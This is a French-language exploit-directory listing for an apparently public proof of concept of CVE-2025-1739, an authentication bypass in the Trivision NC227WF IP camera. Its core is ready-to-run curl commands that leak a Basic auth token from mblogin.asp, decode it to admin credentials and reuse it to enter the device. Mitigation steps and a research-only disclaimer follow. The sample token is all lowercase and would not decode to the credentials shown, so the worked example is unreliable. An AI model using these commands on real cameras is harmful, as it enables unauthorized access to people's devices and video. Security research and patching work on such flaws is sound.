Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
Outils/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-1738 & CVE-2025-1739 — PoC Caméra Trivision NC227WF

📋 Aperçu

CVECVSS v3.1ScoreCWEType
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Contournement d'authentification par fuite d'authentification Basic

🔓 CVE-2025-1739 — Exposition du code d'authentification Basic / Contournement d'authentification (CWE-288)

Description

La caméra divulgue un jeton d'authentification Basic valide encodé en Base64 via le point d'accès mblogin.asp. Ce jeton peut être trivialement décodé et réutilisé pour obtenir un accès non autorisé à l'appareil — aucune connaissance du mot de passe requise.

  • Vecteur d'attaque : Réseau adjacent (AV:A)
  • Score CVSS : 7.1
  • CWE : CWE-288 (Contournement d'authentification par chemin ou canal alternatif)

Charge utile

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
image

Exemple de réponse

La réponse contient un jeton d'authentification Basic valide :

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Décodage du jeton

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Sortie : admin:unguessable123!

Réutilisation du jeton

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ Atténuation

  • Mettez à jour le firmware si une version corrigée est disponible auprès de Trivision.
  • Isolez la caméra sur un VLAN dédié sans accès externe.
  • Protégez par pare-feu le port de gestion de la caméra depuis les segments réseau non fiables.
  • Changez les identifiants par défaut et changez régulièrement les mots de passe.
  • Surveillez les accès inattendus à activex_pal.asp et mblogin.asp.

⚖️ Avertissement

Ce dépôt est destiné uniquement à des fins de recherche en sécurité éducative et autorisée. Les auteurs ne sont pas responsables d'une mauvaise utilisation. Obtenez toujours une autorisation explicite avant de tester un appareil.

Télécharger l’outil